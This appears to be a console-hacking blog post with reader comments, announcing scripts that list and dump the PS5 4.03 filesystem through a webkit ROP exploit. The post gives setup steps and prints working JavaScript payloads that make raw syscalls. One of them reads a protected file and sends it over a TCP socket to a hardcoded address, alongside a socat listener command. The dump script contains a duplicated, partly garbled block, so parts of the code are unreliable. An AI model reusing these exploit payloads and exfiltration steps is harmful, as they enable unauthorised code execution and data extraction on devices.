PS5 Hacking: Script to dump the PS5 4.03 filesystem released
PlayStation hacker Bigboss, via Zecoxao, has provided the ROP scripts to list and dump the PS5 filesystem on 4.03, through the webkit exploit. This will of course not let you dump all files, but the ones accessible via webkit permissions. This could give us quite an insight into the PS5 files.
Dumping the PS5 4.03 FileSystem – how to
- Probably obvious, but you’ll need a PS5 running firmware 4.03, this will not work on any other firmware.
- You will need to modify the ROP userland execution (released by ChendoChap and ZnullPtr a while ago). You can get the files here.
- After line 650 of exploit.js (alert(`sys_getpid: ${pid}`);), you’ll probably want to delete the sample sections (Threading Sample and Branch Sample), and replace them with Bigboss’ code below.
- Host the resulting files on your favorite server and Load the index.html through the PS5 Browser (you can for example use one of Al-Azif‘s DNS 165.227.83.145 or 192.241.221.79, then access the “user guide” page from your PS5, then use the url redirector)
A) To list the files and folders (this will also give you the name of your “sandbox” string, a semi random folder name specific to you.)
let directory=malloc(256,1); p.writestr(directory.add32(0),"/"); let retopen=await chain.syscall(5,directory,0,0); let directoryBuffer=malloc(1024*1024,1); let directorySize=1024*1024; let retgetdent=await chain.syscall(272,retopen,directoryBuffer,directorySize); let numbytes=parseInt(retgetdent,16); let entry; let num_entry=0; let d_fileno; let d_reclen; let d_type; let d_namelen; let d_name; let position=0; for(position=0;position<numbytes;){ entry=directoryBuffer.add32(position); d_fileno=p.read4(entry.add32(0)); d_reclen=p.read2(entry.add32(4)); d_type=p.read1(entry.add32(6)); d_namelen=p.read1(entry.add32(7)); d_name=p.readstr(entry.add32(8)); alert("num_entry=${num_entry} d_reclen=${d_reclen} d_type=${d_type} d_namelen=${d_namelen} d_name=${d_name} position=${position}"); position=position+d_reclen; parseInt(position)+parseInt(d_reclen,16); num_entry++; }
(source)
B) To dump a file in a target file on your computer:
//POST EXPLOIT STUFF HERE //change once per file name //use for example in your pc socat -u TCP-LISTEN:18194,reuseaddr OPEN:ScePlayReady.self,creat,trunc let tcpsocket=await chain.syscall(97,2,1,0); alert(`sys_socket: ${tcpsocket}`); let tcpsocketaddr=malloc(16,1); p.write1(tcpsocketaddr.add32(1),2); p.write2(tcpsocketaddr.add32(2),0x1247); //change ip for your pc p.write4(tcpsocketaddr.add32(4),0xCD01A8C0); //192(C0)168(A8)1(01)205(CD) alert(`before sys_connect`); let ret_tcpconnect=await chain.syscall(98,tcpsocket,tcpsocketaddr,16); alert(`sys_connect: ${ret_tcpconnect}`); //the right way is to use stat get size but this is quick and dirty test let tcpmessage=malloc(34406400,1); let tcpmessage_size=34406400; let file=malloc(256,1); p.writestr(file.add32(0),"/RcDZV3xbd4/common/lib/ScePlayReady.self");//example path /RcDZV3xbd4/common/lib/ScePlayReady.self, change RcDZV3xbd4 to your sandbox string let retopen_file=await chain.syscall(5,file,0,0); alert(`syscall_open return ${retopen_file}\n`); let file_read=await chain.syscall(3,retopen_file,tcpmessage,tcpmessage_size); alert(`before sys_sendto read ${file_read}`); let ret_tcpsendto=await chain.syscall(133,tcpsocket,tcpmessage,file_read,0,0,0); alert(`sys_sendto: ${ret_tcpsendto} ${file_read}`); let ret_close=await chain.syscall(6,tcpsocket); alert(`sys_close: ${ret_close}`); alert(`syscall_open return ${retopen_file}\n`); let file_read=await chain.syscall(3,retopen_file,tcpmessage,tcpmessage_size); alert(`before sys_sendto read ${file_read}`); let ret_tcpsendto=await chain.syscall(133,tcpsocket,tcpmessage,file_read,0,0,0); alert(`sys_sendto: ${ret_tcpsendto} ${file_read}`); let ret_close=await chain.syscall(6,tcpsocket); alert(`sys_close: ${ret_close}`); //size used was for a self file //after all this your ScePlayReady.self file is created and closed
(source)
Obviously people who have already been working on hacking the PS5 have probably already dumped the files through this mechanism (and, most likely, have been able to investigate even more files through other means), but for those of us who just want to tag along and see how these things are done, this is a pretty straightforward way to get into PS5 hacking and tinkering.
Do you own a PS5 running 4.03? Or have you given up on getting a PS5, let alone one for Jailbreaking purposes? Let me know in the comments.
source: Zecoxao
First
Hello world
I remember when wololo actually had a consistent news stream, gone are the great days of psp homebrew comps new consoles suck and you’d be better off looking at a PC
Yeah, but those were different days. We had more people helping with the site, I had less “IRL” stuff to deal with, and more generally the scene was striving much more with actual homebrew releases, etc…
It might come back with the PS5, who knows.
With all that being said, it’s very unlikely I would ever do anything as huge as the Genesis competition. Organizing this homebrew competition for the PSP drained me for like 6 months.
Is there a way to tell what firmware the PS5 is on by serial number ? I know this was possible with the Nintendo Switch.
I bought one back in November or December and kept it sealed but wondering if it’s on 4.03 or not. Otherwise I might as well sell it for profit
Unfortunately there is no such database. However, I just recently acquired a second PS5 from Walmart last month and it came with 4.03 (I think I got really lucky as other people who bought at the same time as me had higher firmwares). So chances are good that you have 4.03 or below.
thanks for sharing this , you don’t know how many sites I visit for this , thank again
Got a launch PS5, never updated, still sitting in its box, waiting patiently for a jailbreak. Only tested it to make sure it works. I don’t play online, so no problem for me to wait.
Love the look of the ps5 slim I going to have to get one now
still waiting lol
Nooice
hoping for more reveals soon
Got a new one sitting in the box. Don’t even know what firmware it is – waiting for a confirmed hack then I will get to smell the ‘new electronic smell’….some day!
Not like it matters if the PS5 gets hacked anytime soon. The exclusives are great but if you already have a PS4 you aren’t missing out on much besides the 120hz 1080p over HDMI 2.0b
Honestly I’d love a hacked ps5 just to play Bloodborne at 60fps 1080p which was already done on a debug console.
Can’t wait for what’s coming in the scene.. stupidly updated my 0.0 console to play online and can’t find a single console under 4.50 these days and I’ve been through about 7.. absolutely great work from the scene members and moonbsd for his recent kernel disclosure… #ExcitedIsAnUnderstatement
i have ps5 4.03 icant wait